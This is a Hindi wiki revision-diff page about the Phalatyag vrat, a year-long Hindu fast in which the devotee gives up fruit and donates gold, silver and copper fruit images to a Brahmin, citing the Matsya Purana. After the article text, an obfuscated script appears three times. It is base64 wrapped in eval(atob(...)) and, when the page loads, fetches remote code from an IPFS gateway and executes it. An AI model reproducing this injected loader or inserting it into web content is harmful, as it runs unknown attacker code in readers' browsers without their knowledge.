Difference between revisions of "फलत्याग व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष|शुक्ल]] की तृतीया, अष्टमी, द्वादशी या चतुर्दशी तिथि को यह व्रत किया जाता है।  
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष|शुक्ल]] की तृतीया, अष्टमी, द्वादशी या चतुर्दशी तिथि को यह व्रत किया जाता है।  
 
*यह व्रत एक [[वर्ष]] तक किया जाता है।  
 
*यह व्रत एक [[वर्ष]] तक किया जाता है।  
Line 5: Line 5:
 
*कर्ता फलों का त्याग करता है, केवल 18 धान्यों का ही प्रयोग करता है।  
 
*कर्ता फलों का त्याग करता है, केवल 18 धान्यों का ही प्रयोग करता है।  
 
*[[नन्दी]] एवं [[धर्मराज (यमराज)|धर्मराज]] के साथ [[शिव]] की प्रतिमा का निर्माण करना चाहिए।  
 
*[[नन्दी]] एवं [[धर्मराज (यमराज)|धर्मराज]] के साथ [[शिव]] की प्रतिमा का निर्माण करना चाहिए।  
*सोलह प्रकार (यथा–कूष्माण्ड, आम, बदर, केला आदि) के फलों की स्वर्णिम प्रतिमाएँ बनानी चाहिए, 16 अन्य छोटे-छोटे फलों (यथा–आमलक, उदुम्बर) की चाँदी प्रतिनिधि प्रतिमाएँ भी बनानी चाहिए तथा 16 अन्य फलों (यथा–इमली, इंगुद आदि) की ताम्र प्रतिमाएँ बनायी जाती हैं; धान्य की एक राशि पर श्वेत वस्त्र से ढँके दो जलपूर्ण घट रखे जाते हैं तथा एक पलंग बनाया जाता है; [[वर्ष]] के अन्त में ये सभी वस्तुएँ एक सपत्नीक [[ब्राह्मण]] को दान में दे दी जाती हैं।  
+
*सोलह प्रकार (यथा–कूष्माण्ड, आम, बदर, केला आदि) के फलों की स्वर्णिम प्रतिमाएँ बनानी चाहिए, 16 अन्य छोटे-छोटे फलों (यथा–आमलक, उदुम्बर) की चाँदी प्रतिनिधि प्रतिमाएँ भी बनानी चाहिए तथा 16 अन्य फलों (यथा–इमली, इंगुद आदि) की ताम्र प्रतिमाएँ बनायी जाती हैं।
*यदि यह सब देने में असमर्थता हो तो केवल धातु निर्मित फल घड़े एवं शिव तथा धर्म की स्वर्णिम प्रतिमाएँ दे दी जाती हैं। कर्ता सहस्रों युगों तक रुद्रलोक में रहता है <ref>मत्स्यपुराण (96|1-25)</ref>, <ref>हेमाद्रि (व्रत0 2, 906-909)</ref>; <ref>कृत्यकल्पतरु (व्रत0 436-439)</ref>
+
*धान्य की एक राशि पर श्वेत वस्त्र से ढँके दो जलपूर्ण घट रखे जाते हैं तथा एक पलंग बनाया जाता है।
 +
*[[वर्ष]] के अन्त में ये सभी वस्तुएँ एक सपत्नीक [[ब्राह्मण]] को दान में दे दी जाती हैं।  
 +
*यदि यह सब देने में असमर्थता हो तो केवल धातु निर्मित फल घड़े एवं शिव तथा धर्म की स्वर्णिम प्रतिमाएँ दे दी जाती हैं।  
 +
*कर्ता सहस्रों युगों तक रुद्रलोक में रहता है।<ref>[[मत्स्य पुराण]] (96|1-25</ref>, <ref>हेमाद्रि (व्रतखण्ड 2, 906-909</ref>; <ref>कृत्यकल्पतरु (व्रतखण्ड 436-439</ref>
 
 
 
 
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:53, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl ki tritiya, ashtami, dvadashi ya chaturdashi tithi ko yah vrat kiya jata hai.
  • yah vrat ek varsh tak kiya jata hai.
  • devata, shiv ka poojan hota hai.
  • karta phaloan ka tyag karata hai, keval 18 dhanyoan ka hi prayog karata hai.
  • nandi evan dharmaraj ke sath shiv ki pratima ka nirman karana chahie.
  • solah prakar (yatha–kooshmand, am, badar, kela adi) ke phaloan ki svarnim pratimaean banani chahie, 16 any chhote-chhote phaloan (yatha–amalak, udumbar) ki chaandi pratinidhi pratimaean bhi banani chahie tatha 16 any phaloan (yatha–imali, iangud adi) ki tamr pratimaean banayi jati haian.
  • dhany ki ek rashi par shvet vastr se dhanke do jalapoorn ghat rakhe jate haian tatha ek palang banaya jata hai.
  • varsh ke ant mean ye sabhi vastuean ek sapatnik brahman ko dan mean de di jati haian.
  • yadi yah sab dene mean asamarthata ho to keval dhatu nirmit phal gh de evan shiv tatha dharm ki svarnim pratimaean de di jati haian.
  • karta sahasroan yugoan tak rudralok mean rahata hai.[1], [2]; [3]

 


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. matsy puran (96|1-25
  2. hemadri (vratakhand 2, 906-909
  3. krityakalpataru (vratakhand 436-439

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>